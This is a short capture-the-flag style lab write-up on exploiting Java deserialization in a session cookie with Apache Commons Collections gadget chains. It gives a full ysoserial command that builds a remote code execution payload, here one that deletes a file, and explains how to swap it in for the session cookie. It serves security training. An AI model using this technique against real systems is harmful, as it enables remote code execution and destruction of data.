Exploiting Java deserialization with Apache Commons
Task
This lab uses a serialization-based session mechanism and loads the Apache Commons Collections library. Although you don’t have source code access, you can still exploit this lab using pre-built gadget chains.
To solve the lab, use a third-party tool to generate a malicious serialized object containing a remote code execution payload. Then, pass this object into the website to delete the morale.txt file from Carlos’s home directory.
You can log in to your own account using the following credentials: wiener:peter
Solution
You can see your session cookie value starts with rO which indicates it’s a base64 encoded Java serialized object. Since you don’t have source code access, a feasible option is to try out pre-built gadget chains.
Download ysoserial. WHY… So… Serial!!!🤡
Install java:
sudo apt install default-jdk
If it’s possible you should choose an older version like openjdk-11-jdk. In my case my Debian doesn’t have it in the default APT repositories.
For 16+ Java, you need to add --add-opens options below to run ysoserial:
java \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED \
--add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED \
--add-opens=java.base/java.net=ALL-UNNAMED \
--add-opens=java.base/java.util=ALL-UNNAMED \
-jar ysoserial-all.jar CommonsCollections4 'rm /home/carlos/morale.txt' | base64 | xclip -selection clipboard
URL encode the payload using Decoder or ctrl+U and replace your session cookie with it. Send a request. Even if you encounter some errors the payload will still do the job.